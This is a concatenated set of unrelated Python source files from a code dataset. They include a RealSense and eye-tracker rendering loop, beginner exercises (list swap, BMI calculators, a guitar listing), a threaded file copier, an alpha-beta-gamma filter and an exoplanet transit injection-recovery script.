otherwise, value is zero\n \n #normalization\n if np.sum(kernel) == 0: # when does this occurs? if psf is too small in every pixel\n kernel[res_window[1]//2, res_window[0]//2]=1\n else:\n kernel = kernel / np.sum(kernel)\n\n compensate_img = cv2.filter2D(sliced_color_img, -1, kernel)\n filtered_img += compensate_img\n\n #just add zero depth pixel to filtered image\n pixel_select = np.zeros_like(depth_img)\n pixel_select[depth_img==0] = 1\n pixel_select = np.stack((pixel_select, pixel_select, pixel_select), axis = 2)\n color_img_zero_depth = color_img * pixel_select\n filtered_img += color_img_zero_depth\n\n edge = np.clip(edge, 0, 255).astype('uint8')\n dilated_edge = cv2.dilate(edge, np.ones((3, 3)))\n dilated_edge = np.stack((dilated_edge, dilated_edge, dilated_edge), axis=2)\n\n #blurred_filtered_img = cv2.GaussianBlur(filtered_img, (5, 5), 0) # Smoothing boundary\n blurred_filtered_img = filtered_img # No smoothing boundary\n smoothed_filtered_img = np.where(dilated_edge==np.array([255,255,255]), blurred_filtered_img, filtered_img)\n\n #smoothed_filtered_img = filtered_img\n smoothed_filtered_img = np.clip(smoothed_filtered_img, 0, np.max(smoothed_filtered_img))\n smoothed_filtered_img = smoothed_filtered_img / np.sum(smoothed_filtered_img) * target_intensity_sum / 255.0\n smoothed_filtered_img = np.clip(smoothed_filtered_img, 0, 1)\n\n return smoothed_filtered_img, len(sliced_color_imgs)\n\n\nif __name__ == \"__main__\":\n\n # Configure depth and color streams\n pipeline = rs.pipeline()\n config = rs.config()\n\n config.enable_stream(rs.stream.depth, DEPTH_CAMERA_RES[0], DEPTH_CAMERA_RES[1], rs.format.z16, 30)\n config.enable_stream(rs.stream.color, COLOR_CAMERA_RES[0], COLOR_CAMERA_RES[1], rs.format.bgr8, 30)\n\n # zero hole filling filter\n spatial = rs.spatial_filter()\n spatial.set_option(rs.option.filter_magnitude, 5)\n spatial.set_option(rs.option.filter_smooth_alpha, 1)\n spatial.set_option(rs.option.filter_smooth_delta, 50)\n spatial.set_option(rs.option.holes_fill, 3)\n hole_filling = rs.hole_filling_filter()\n\n # Align process for realsense frames\n align_to = rs.stream.color\n align = rs.align(align_to)\n\n # Start streaming for Realsense\n pipeline.start(config)\n\n # Start connecting pupil tracker\n context = zmq.Context()\n req = context.socket(zmq.REQ) #open a req port to talk to pupil\n req.connect(\"tcp://%s:%s\" %(addr,req_port))\n req.send(b'SUB_PORT') # ask for the sub port\n sub_port = req.recv()\n\n # open a sub port to listen to pupil in eye_1_3d\n sub_1_3d = context.socket(zmq.SUB)\n sub_1_3d.connect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))\n sub_1_3d.setsockopt(zmq.SUBSCRIBE, b'pupil.1.3d')\n\n need_calculate = input(\"Start Calculating convert matrix?(Y/n) : \")\n\n if (need_calculate.upper() == \"Y\") :\n convert_matrix = make_convert_matrix(sub_1_3d)\n print(\"convert matrix : \", convert_matrix)\n np.save('./convert_matrix',convert_matrix)\n\n input(\"Start convert filtered image(press enter)\")\n time_0 = time.time()\n\n # Start convert filtered image\n try:\n while True:\n current_time = time.time()\n\n # Collect Data from pupil_tracker & Wait for a coherent pair of frames: depth and color\n sub_1_3d.connect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))\n topic,msg_1 = sub_1_3d.recv_multipart() # pupil tracker (maximum 120Hz)\n\n frames = pipeline.wait_for_frames() # realsense (maximum 30Hz)\n\n aligned_frames = align.process(frames)\n\n depth_frame = aligned_frames.get_depth_frame()\n color_frame = aligned_frames.get_color_frame()\n\n if not depth_frame or not color_frame:\n continue\n\n message_1 = loads(msg_1)\n theta = message_1[b'theta']\n phi = message_1[b'phi']\n\n # Filter the depth frame\n depth_frame = spatial.process(depth_frame)\n depth_frame = hole_filling.process(depth_frame)\n\n # Convert images to numpy arrays\n depth_image = np.asanyarray(depth_frame.get_data())\n diopter_image = 1000.0/depth_image\n color_image = np.asanyarray(color_frame.get_data())\n # breakpoint()\n\n # Apply colormap on depth image (image must be converted to 8-bit per pixel first)\n # depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.085), cv2.COLORMAP_JET)\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(diopter_image, alpha=63.75), cv2.COLORMAP_JET)\n #depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n\n # Check tracking point on images\n converted_theta, converted_phi = convert_pupil_to_realsense(theta, phi)\n\n H, W = color_image.shape[0], color_image.shape[1]\n point_y = int(H/2 + H/2 * (np.tan(converted_theta) / np.tan(COLOR_CAMERA_MAX_THETA)))\n point_x = int(W/2 + W/2 * (np.tan(converted_phi) / np.tan(COLOR_CAMERA_MAX_PHI)))\n point_y = np.clip(point_y, 0, H-1)\n point_x = np.clip(point_x, 0, W-1)\n\n # depth_colormap = cv2.circle(depth_colormap, (point_x, point_y), 5, (0,0,255), -1)\n # text = \"depth : \" + str(depth_image[point_y][point_x]) + \"mm\"\n # depth_colormap = cv2.putText(depth_colormap, text, (10,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2)\n\n \n #filtered_image = color_image\n # filtered_image, _ = full_rendering_display(color_image, depth_image, depth_image[point_y][point_x] / 1000.0)\n filtered_image, _ = rendering_display(color_image, depth_image, depth_image[point_y][point_x] / 1000.0, num_slicing_imgs = num_slicing_imgs)\n filtered_image = cv2.circle(filtered_image, (point_x, point_y), 5, (0,0,255), -1)\n # color_image = cv2.circle(color_image, (point_x, point_y), 5, (0,0,255), -1)\n\n # print(\"time : \", round(current_time - time_0, 4))\n # print(\"theta, phi : \", theta, phi)\n # print(\"position(x,y), depth : \", point_x, point_y, depth_image[point_y][point_x], \"\\n\")\n\n\n # Show images\n cv2.namedWindow('Convert_filtered_image', cv2.WND_PROP_FULLSCREEN)\n cv2.resizeWindow(\"Convert_filtered_image\", resolution[0], resolution[1])\n cv2.moveWindow('Convert_filtered_image', screen.x - 1, screen.y - 1)\n cv2.setWindowProperty('Convert_filtered_image', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n display_filtered_image = cv2.copyMakeBorder(filtered_image, int((resolution[1]-filtered_image.shape[0])/2), int((resolution[1]-filtered_image.shape[0])/2), int((resolution[0]-filtered_image.shape[1])/2), int((resolution[0]-filtered_image.shape[1])/2), 0)\n #display_filtered_image = filtered_image\n\n cv2.imshow('Convert_filtered_image', display_filtered_image)\n\n images = np.hstack((color_image, depth_colormap))\n cv2.namedWindow('original_image', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('original_image', images)\n cv2.waitKey(1)\n\n sub_1_3d.disconnect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))\n\n finally:\n # Stop streaming\n pipeline.stop()\n sub_1_3d.disconnect(b\"tcp://%s:%s\" %(addr.encode('utf-8'),sub_port))","repo_name":"wogur110/OEQE_project","sub_path":"display_filtered_image.py","file_name":"display_filtered_image.py","file_ext":"py","file_size_in_byte":17918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42017552411","text":"List = []\n\nsize = int(input(\"Input number of elements of list: \"))\n\nfor i in range(size):\n element = int(input(\"List[\" + str(i) + \"] = \"))\n List.append(element)\n\n\n\nprint(\"Input elements you want to swap in list: \")\n\nPos_1 = int(input(\"Position 1: \"))\nPos_2 = int(input(\"Position 2: \"))\n\nprint(\"Original List:\", List)\ntempt = List[Pos_1]\nList[Pos_1] = List[Pos_2]\nList[Pos_2] = tempt\nprint(\"Swapped List:\", List)\n","repo_name":"giang09101999/Data","sub_path":"Python/Data type/List/Exercises/Swap two elements in a list.py","file_name":"Swap two elements in a list.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"258029939","text":"import logging\nimport os\nimport queue\nimport random\nimport threading\nimport time\n\nfrom collections import namedtuple\nfrom os import listdir, walk\nfrom os.path import isfile, join\n\nlogging.basicConfig(level=logging.DEBUG,\n format='(%(threadName)-9s) %(message)s',)\n\nBUF_SIZE = 2\nq = queue.Queue(maxsize=BUF_SIZE)\nBUF_OBJECT_SIZE = 1024*1024*25\n\nBufferObject = namedtuple(\"BufferObject\", \"buffer filepath index\")\n\n\nclass ProducerThread(threading.Thread):\n def __init__(self, src, name=None):\n super(ProducerThread, self).__init__()\n self.name = name\n self.src = src\n\n def run(self):\n logging.debug(\"producer started!\")\n for r, d, f in os.walk(self.src):\n for file in f:\n filepath = os.path.join(r, file)\n with open(filepath, \"rb\", buffering=0) as file:\n current_loc = 0\n file.seek(current_loc)\n while current_loc < os.path.getsize(filepath):\n buffer = BufferObject(\n buffer=file.read(BUF_OBJECT_SIZE),\n filepath=filepath, index=current_loc)\n current_loc += BUF_OBJECT_SIZE\n q.put(buffer)\n\n\nclass ConsumerThread(threading.Thread):\n def __init__(self, src, dest, name=None):\n super(ConsumerThread, self).__init__()\n self.name = name\n self.src = src\n self.dest = dest\n\n def run(self):\n logging.debug(\"consumer started!\")\n\n src_size = self.get_dir_size(self.src)\n bytes_copied = 0\n\n while bytes_copied < src_size:\n while q.qsize() > 0:\n buffer = q.get()\n logging.debug('Got ' + str(buffer.filepath) + ' from q')\n filepath = buffer.filepath.replace(self.src, self.dest)\n dir_name = os.path.dirname(filepath)\n\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n if not os.path.exists(filepath):\n open(filepath, 'w').close()\n\n with open(filepath, \"r+b\", buffering=0) as file:\n logging.debug('writing to:' + str(filepath))\n file.seek(buffer.index)\n file.write(buffer.buffer)\n bytes_copied += len(buffer.buffer)\n time.sleep(random.random())\n\n def get_dir_size(self, start_path):\n total_size = 0\n for dirpath, dirnames, filenames in os.walk(start_path):\n for f in filenames:\n fp = os.path.join(dirpath, f)\n total_size += os.path.getsize(fp)\n return total_size\n\n\nif __name__ == \"__main__\":\n start = time.time()\n\n src = \"enter path here\"\n dest = \"enter path here\"\n\n p = ProducerThread(name='producer', src=src)\n c = ConsumerThread(name='consumer', src=src, dest=dest)\n\n p.start()\n time.sleep(1)\n c.start()\n time.sleep(1)\n\n p.join()\n c.join()\n\n end = time.time()\n print(end - start)\n","repo_name":"KaTaiHo/FastCopy","sub_path":"fastcopy.py","file_name":"fastcopy.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12301633373","text":"soma = 0\r\nlixo = 0\r\n\r\nfor i in range(1, 7):\r\n num = float(input('digite um numero quantas vezes pedir '))\r\n\r\n if num % 2 == 0:\r\n soma = soma + num\r\n else:\r\n lixo = lixo + num\r\n\r\nprint(soma)\r\n","repo_name":"LiR4/ex-python","sub_path":"ex/ex-21.py","file_name":"ex-21.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"44709610257","text":"from guitar_class import Guitar\n\nprint(\"My Guitars!\")\n\nguitars = []\nname = input(\"Name:\")\n\nwhile name != \"\":\n year = int(input(\"Year:\"))\n cost = float(input(\"Cost:\"))\n guitar = Guitar(name, year, cost)\n guitars.append(guitar)\n print()\n name = input(\"Name:\")\n\n\nname_length = max(len(guitar.name) for guitar in guitars)\ncost_length = max(len(str(guitar.cost)) for guitar in guitars)\n\nprint()\nprint(\"These are my guitars:\")\nfor i, guitar in enumerate(guitars, 1):\n vintage_string = \"(Vintage)\" if guitar.is_vintage() else \"\"\n print(\"Guitar {}: {:{}} ({}), worth ${:.2f}{}\".format(i, guitar.name, name_length, guitar.year, guitar.cost,\n vintage_string))\n","repo_name":"Dante-Gaius/CP1404_Practicals","sub_path":"cp1404practicals/Prac_06/guitars.py","file_name":"guitars.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22638216695","text":"import random\r\n#16 A\r\nE16a = 15 * 38\r\nprint(E16a)\r\n\r\n#16 B\r\nE16b = (3 + 4) * (5 + 6)\r\nprint(E16b)\r\n\r\n#16 C\r\nE16C = 7 / 2\r\nprint(int(E16C))\r\n\r\n#16 D\r\nE16D = 48 // 5\r\nprint(E16D)\r\n\r\n#16 E\r\nE16E = (8 + 7 + 4 + 2) / 4\r\nprint(E16E)\r\n\r\n#16 F\r\nE16F = 2 ** 10\r\nprint(int(E16F))\r\n\r\n#16 G\r\nE16G = 49 ** 0.5\r\nprint(E16G)\r\n\r\n#16 H\r\nE16H = 80 * 0.25\r\nprint(int(E16H))\r\n\r\n\r\n\r\n\r\n\r\n#18\r\n#I am 170cm tall, i.e. 5 feet and 7 inches.\r\nl = 179\r\nl2 = l % 30.48\r\nprint(\"I am \", l, \"cm tall, i.e. \", (int(l2)), \"feet,\", \"6\", \"inches.\")\r\n\r\n\r\n\r\n#19\r\n#The length of the sides of the triangle is a, b and c. Write a program \r\n#that calculates the area of the triangle using the Heron formula.\r\n#Read the values of the sides of the triangle from the keyboard. Using the\r\n#program, calculate the area of the triangle for the sides 3, 4 and 5.\r\n\r\na = 3\r\nb = 4\r\nc = 5\r\np = (a + b + c) // 2\r\nS = (p * (p - a) * (p - b) * (p - c)) ** 0.5\r\nprint(int(S))\r\n\r\n'''\r\n#20\r\nh = float(input(\"Enter your heigh: \"))\r\nw = int(input(\"Enter your weight: \"))\r\nBMI = (w / (h ** 2))\r\nprint(\"Your BMI index is \", BMI)\r\n'''\r\n\r\n#21\r\nroll1 = random.randint(1, 6)\r\nroll2 = random.randint(1, 6)\r\nroll3 = random.randint(1, 6)\r\ns1 = roll3 + roll2 + roll1\r\nr = f\"The 1 roll is: {roll1};\\nThe 2 roll is: {roll2};\\nThe 3 roll is: {roll3}.\"\r\ns = f\"The sum of 3 rolls is: {s1}.\"\r\nprint(r)\r\nprint(s)\r\n\r\n\r\n#23\r\n#23% VAT was paid from the amount of PLN 15.84. Calculate and display VAT.\r\n# Apply formatting with decimal places. Sample result:\r\n#Amount : 15.84 zł\r\n#VAT 23% : 3.64 zł\r\na = int(input(\"Enter your full amount: \"))\r\nv = a * 0.23\r\nprint(\"Amount : \", a)\r\nprint(\"VAT 23% : \", v)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"DmytroKorodchenkov/HW_0","sub_path":"HW_0.py","file_name":"HW_0.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"11586787477","text":"from tkinter import *\n#main/root window \nroot = Tk()\n#setting window size & title\nroot.geometry(\"600x600\")\nroot.title(\"Simple B.M.I calculator\")\n#adding background\nC = Canvas(root,bg=\"purple\",height=200,width=200).grid()\nfileName = PhotoImage(file = \"background.png\")\nbackground_label=Label(root , image=fileName)\nbackground_label.place(x=0,y=0,relwidth=1,relheight=1) \n#entry widgets\nw_entry = Entry(root,width=10)\nw_entry.grid(row=4,column=3,padx=10,pady=10,columnspan=2)\nh_entry = Entry(root,width=10)\nh_entry.grid(row=4,column=5,padx=10,pady=10,columnspan=2)\n#function for entry weight and height and calculating the BMI \n#BMI formula = weight(kg) / height^2 (m)\ndef Calculate():\n weight = float(w_entry.get())\n height = float(h_entry.get())\n BMI = round(weight/height**2,2)\n bg_color = \"\"\n result = \"\"\n #checking if : underweight , normal weight , overweight \n if(BMI < 18.5):\n bg_color = \"red\"\n result = \"Underweight\" \n if(BMI >= 18.5 and BMI <=24.9):\n bg_color = \"Green\"\n result = \"Normal Weight\"\n if(BMI >= 25.0):\n bg_color = \"Red\"\n result = \"Overweight\" \n BMI_label = Label(root,text=\"BMI : {0} {1}\".format(BMI,result) , bg=bg_color).grid(row=8,column=8)\n#widgets\nw_label = Label(root,text=\"Weight(in kg)\").grid(row=3,column=3) \nh_label = Label(root,text=\"Height(in m)\").grid(row=3,column=5)\nr_label = Label(root,text=\"BMI\").grid(row=6,column=3)\ncalc_btn = Button(root,text=\"Calculate\",command=Calculate).grid(row=8,column=3,padx=10,pady=10)\nroot.mainloop() ","repo_name":"CarlosArro2001/BMI_Calculator_Tkinter","sub_path":"BMI_app.py","file_name":"BMI_app.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"43280362017","text":"\"\"\" Alpha-Beta-Gamma Filter Implementation\n\nBased on the examples:\nhttps://www.kalmanfilter.net/alphabeta.html\n\"\"\"\n\nimport math\nimport numpy as np\n\n\nclass AlphaBetaGammaFilter():\n def __init__(\n self, \n alpha:float = 1.0,\n beta:float = 1.0,\n gamma:float = 1.0,\n delta_t:float = 1.0\n ) -> None:\n \"\"\" Alpha-Beta-Gamma Filter class for tracking\n \n Input:\n alpha: (float) multiplier for position prediction equation (0.0 <= alpha <= 1.0)\n beta: (float) multiplier for velocity prediction equation (0.0 <= beta <= 1.0)\n gamma: (float) multiplier for acceleration prediction equation (0.0 <= gamma <= 1.0)\n delta_t: (float) timing interval\n \n Return: None\n \"\"\"\n self.alpha = alpha\n self.beta = beta\n self.gamma = gamma\n \n self.delta_t = delta_t\n self.timer = 0\n \n # State update equation variables\n # This is for estimating the current position, velocity, and acceleration\n # considering previous estimates and the current measurement\n self.measured_pos = 0.0 # measured position\n self.current_x = 0.0 # initial (current) position\n self.current_v = 0.0 # initial (current) velocity\n self.current_a = 0.0 # initial (current) acceleration\n \n # State extrapolation variables\n # This is for predicting position, velocity, and acceleration for next time frame\n # We use the \"current\" variables to predict the below attributes\n self.pred_x = 0.0\n self.pred_v = 0.0\n self.pred_a = 0.0\n \n\n def initialize(\n self, \n x:float = None, \n v:float = None, \n a:float = None\n ) -> None:\n \"\"\" Initialize initial conditions (position, velocity, and acceleration)\"\"\"\n self.current_x = x\n self.current_v = v\n self.current_a = a\n \n # With initial conditions set, predict for an initial guess\n self.pred_x = self.current_x + self.current_v * self.delta_t + (0.5 * self.current_a * self.delta_t**2)\n self.pred_v = self.current_v + self.current_a * self.delta_t\n self.pred_a = self.current_a\n \n print('Position (t={}): {}'.format(self.timer,self.pred_x))\n print('Velocity (t={}): {}'.format(self.timer,self.pred_v))\n print('Acceleration (t={}): {}'.format(self.timer,self.pred_a))\n \n\n def update(\n self,\n z:float = None\n ) -> None:\n \"\"\" Compute:\n i) current estimate with state update equations\n ii) next state estimate (prediction)\n \"\"\"\n # Update timer first...\n self.timer += 1\n self.current_x = self.pred_x\n self.current_v = self.pred_v\n self.current_a = self.pred_a\n \n # Compute current estimate\n x = self.current_x\n diff = z - x\n self.current_x = x + self.alpha * diff\n self.current_v = self.current_v + self.beta * (diff / self.delta_t)\n self.current_a = self.current_a + self.gamma * (diff / (0.5 * self.delta_t**2))\n \n print('Position Est. (t={}): {}'.format(self.timer,self.current_x))\n print('Velocity Est. (t={}): {}'.format(self.timer,self.current_v))\n print('Acceleration Est. (t={}): {}'.format(self.timer,self.current_a))\n \n \n # Compute prediction for current time\n self.pred_x = self.current_x + self.current_v * self.delta_t + (0.5 * self.current_a * self.delta_t**2)\n self.pred_v = self.current_v + self.current_a * self.delta_t\n self.pred_a = self.current_a\n \n print('Position (t={}): {}'.format(self.timer,self.pred_x))\n print('Velocity (t={}): {}'.format(self.timer,self.pred_v))\n print('Acceleration (t={}): {}'.format(self.timer,self.pred_a))\n \n\n\nif __name__ == \"__main__\":\n abg_filter = AlphaBetaGammaFilter(\n alpha=0.5, \n beta=0.4, \n gamma=0.1, \n delta_t=5\n )\n \n abg_filter.initialize(\n x=30000,\n v=50,\n a=0\n )\n \n abg_filter.update(z=30160)\n abg_filter.update(z=30365)\n \n","repo_name":"ManuelSerna/cv-notes","sub_path":"estimation/filters/AlphaBetaGammaFilter.py","file_name":"AlphaBetaGammaFilter.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"23276096446","text":"#Runs an injection recovery for a given light curve. Each iteration injects a different random period and planet radius, performs a periodogram analysis to try and find the period, \n#and outputs a 0 or 1 depending on whether the correct period was recovered or not. It is output into a pandas table column as ['recover?']. Plotting script is also included.\n#####normalized_corrected: a processed light curve that will be used for the injection recovery\n#####stellar_radius: the radius of the star in solar radii\n#####trials: number of injected planets to try for the injected recovery. Recommend more than 1000 since the statistics are a bit iffy when a lower value is selected\n\nimport numpy as np\nimport pandas as pd\nimport lightkurve as lk\nimport astropy.units as u\nimport batman\nfrom astropy.timeseries import BoxLeastSquares\n\n\ndef vary_params(normalized_corrected, stellar_radius=1.325, trials=1000):\n output_table = pd.DataFrame()\n Rplanet = []\n Pinject = []\n Pdetermine = []\n recover = []\n \n #print(output_table['depth'])\n rad_min = 0.02115/stellar_radius #now in R_hoststar\n rad_max = 0.2/stellar_radius #now in R_hoststar\n \n depths = np.random.uniform(rad_min, rad_max, trials) # random transit depths to inject\n midtimes = np.random.uniform(min(normalized_corrected.time.value), max(normalized_corrected.time.value), trials) # mid-transit times to inject if you want\n periods = np.random.uniform(0.3,18,trials) # periods to inject\n\n for depth, midtime, period in zip(depths, midtimes, periods):\n params = batman.TransitParams() #object to store transit parameters\n params.t0 = midtime #time of inferior conjunction\n params.per = period #orbital period\n params.rp = depth #planet radius (in units of stellar radii)\n semimaj = ((((7.496*(10**(-6)))*(period**2))**(1/3))*215.032)/stellar_radius #calc a based on period, and in terms of host star radius\n params.a = semimaj #semi-major axis (in units of stellar radii)\n params.inc = 89. #orbital inclination (in degrees)\n params.ecc = 0. #eccentricity\n params.w = 90. \n params.u = [0.1, 0.3] #limb darkening coefficients [u1, u2]\n params.limb_dark = \"quadratic\" #limb darkening model\n\n # Define the times at which to evaluate the fake transit\n t=normalized_corrected.time.value\n\n # Create the batman transit model\n m = batman.TransitModel(params, t)\n\n # Generate the fake light curve transit\n injected_model = m.light_curve(params)\n\n\n # Inject the fake transit into the real data\n injected_flux = normalized_corrected.flux.value + injected_model - 1.0\n\n\n lc_injected=normalized_corrected.copy()\n lc_injected.flux = injected_flux\n #fig,axs=plt.subplots(3,1,figsize=(10,10))\n planetrad = depth*stellar_radius * 9.73116 #convert the solar radii to jupiter radii\n #lc_injected.scatter(ax=axs[0],s=25,color='r',label='injected transit signal')\n #normalized_corrected.scatter(ax=axs[0],s=25)\n\n period_grid = np.linspace(0.4, 18, 1000)\n bls = lc_injected.to_periodogram(method='bls', period=period_grid, frequency_factor=500);\n #bls.plot(ax=axs[1],label=f'best p = {bls.period_at_max_power:.2f}');\n planet_b_period = bls.period_at_max_power\n planet_b_t0 = bls.transit_time_at_max_power\n planet_b_dur = bls.duration_at_max_power\n #lc_injected.fold(period=planet_b_period, epoch_time=planet_b_t0).scatter(ax=axs[2],label='')\n\n blsorig = normalized_corrected.to_periodogram(method='bls', period=period_grid, frequency_factor=500);\n origplanet_b_period = blsorig.period_at_max_power\n detectorig = abs((origplanet_b_period.value/period)-round(origplanet_b_period.value/period))\n\n detect = abs((planet_b_period.value/period)-round(planet_b_period.value/period))\n\n #axs[0].set_title(f'Rplanet(Rjup Radii) = {planetrad:.4f}, Midtime = {midtime:.2f}, Period = {period:.2f},operiod = {origplanet_b_period:.2f}')\n\n\n #print(f'detectval={detect}')\n accept_thresh=0.05\n if detectorig < accept_thresh:\n found = 0 #\"False\"\n\n elif detect < accept_thresh:\n found = 1 #\"True\"\n else:\n found = 0 #\"False\"\n\n #print(f'depth: {planetrad:.4f} actual:{period:.4f} calc:{planet_b_period:.4f} Recover?:{found}')\n Rplanet.append(planetrad)\n Pinject.append(period)\n Pdetermine.append(planet_b_period.value)\n recover.append(found)\n\n output_table['Rplanet'] = Rplanet\n output_table['Pinject'] = Pinject\n output_table['Pdetermine'] = Pdetermine\n output_table['recover?'] = recover\n \n return output_table\n\n\n\n\noutput_table = output_table\n\nradlist1=np.linspace(0.2,1.9,18)\nradlist2=np.linspace(0.3,2,18)\n\ndetectionmatrix = np.empty((1,18))\n\nfor r1,r2 in zip(radlist1,radlist2):\n p1 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(0, 1))]\n recoverpercentp1 = (p1['recover?'].sum())/len(p1.index)\n #print(recoverpercentp1)\n\n p2 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(1, 2))]\n recoverpercentp2 = (p2['recover?'].sum())/len(p2.index)\n #print(recoverpercentp2)\n\n p3 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(2, 3))]\n recoverpercentp3 = (p3['recover?'].sum())/len(p3.index)\n #print(recoverpercentp3)\n\n p4 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(3, 4))]\n recoverpercentp4 = (p4['recover?'].sum())/len(p4.index)\n #print(recoverpercentp4)\n\n p5 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(4, 5))]\n recoverpercentp5 = (p5['recover?'].sum())/len(p5.index)\n #print(recoverpercentp5)\n\n p6 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(5, 6))]\n recoverpercentp6 = (p6['recover?'].sum())/len(p6.index)\n #print(recoverpercentp6)\n\n p7 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(6, 7))]\n recoverpercentp7 = (p7['recover?'].sum())/len(p7.index)\n #print(recoverpercentp7)\n\n p8 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(7, 8))]\n recoverpercentp8 = (p8['recover?'].sum())/len(p8.index)\n #print(recoverpercentp8)\n\n p9 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(8, 9))]\n recoverpercentp9 = (p9['recover?'].sum())/len(p9.index)\n #print(recoverpercentp9)\n #print(' ')\n\n \n p10 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(9, 10))]\n recoverpercentp10 = (p10['recover?'].sum())/len(p10.index)\n #print(recoverpercentp1)\n\n p11 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(10, 11))]\n recoverpercentp11 = (p11['recover?'].sum())/len(p11.index)\n #print(recoverpercentp2)\n\n p12 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(11, 12))]\n recoverpercentp12 = (p12['recover?'].sum())/len(p12.index)\n #print(recoverpercentp3)\n\n p13 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(12, 13))]\n recoverpercentp13 = (p13['recover?'].sum())/len(p13.index)\n #print(recoverpercentp4)\n\n p14 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(13, 14))]\n recoverpercentp14 = (p14['recover?'].sum())/len(p14.index)\n #print(recoverpercentp5)\n\n p15 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(14, 15))]\n recoverpercentp15 = (p15['recover?'].sum())/len(p15.index)\n #print(recoverpercentp6)\n\n p16 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(15, 16))]\n recoverpercentp16 = (p16['recover?'].sum())/len(p16.index)\n #print(recoverpercentp7)\n\n p17 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(16, 17))]\n recoverpercentp17 = (p17['recover?'].sum())/len(p17.index)\n #print(recoverpercentp8)\n\n p18 = output_table[(output_table['Rplanet'].between(r1, r2)) & (output_table['Pinject'].between(17, 18))]\n recoverpercentp18 = (p18['recover?'].sum())/len(p18.index) \n \n matrixgrid = np.array([[recoverpercentp1,recoverpercentp2,recoverpercentp3,recoverpercentp4,recoverpercentp5,\n recoverpercentp6,recoverpercentp7,recoverpercentp8,recoverpercentp9,recoverpercentp10,\n recoverpercentp11,recoverpercentp12,recoverpercentp13,recoverpercentp14,\n recoverpercentp15,recoverpercentp16,recoverpercentp17,recoverpercentp18]])\n detectionmatrix = np.concatenate((detectionmatrix, matrixgrid), axis=0)\n\ndetectionmatrix = np.delete(detectionmatrix, obj=0, axis=0)\n\n\n\nfig, ax = plt.subplots(figsize=(10, 10))\n# Using matshow here just because it sets the ticks up nicely. imshow is faster.\nax.matshow(detectionmatrix, cmap='plasma')\n\nfor (i, j), z in np.ndenumerate(detectionmatrix):\n ax.text(j, i, '{:0.3f}'.format(z), ha='center', va='center')\n ax.margins(x=0)\n\nax.set_xticks([-0.5,0.5,1.5,2.5,3.5,4.5,5.5,6.5,7.5,8.5,9.5,10.5,11.5,12.5,13.5,14.5,15.5,16.5,17.5])\nax.set_xticklabels([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18])\n\nax.set_yticks([-0.5,0.5,1.5,2.5,3.5,4.5,5.5,6.5,7.5,8.5,9.5,10.5,11.5,12.5,13.5,14.5,15.5,16.5,17.5])\nax.set_yticklabels([0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9,2])\n\nplt.gca().invert_yaxis()\n\nplt.tick_params(labelbottom=True, labeltop=False)\nplt.title(f'INSERT TITLE HERE')\nplt.xlabel('Period [days]')\nplt.ylabel('R_planet [R_Jup]')\n\n#plt.xscale('log')\n\n#ax.scatter(output_table['Pinject'],output_table['Rplanet'])\n\nplt.show() \n","repo_name":"billy210/research","sub_path":"inject-recover.py","file_name":"inject-recover.py","file_ext":"py","file_size_in_byte":10220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15187067387","text":"import os\nimport sys\nimport time\nimport music_reports\nimport print_ascii_art\nfrom prettytable import PrettyTable\n\n\ndef 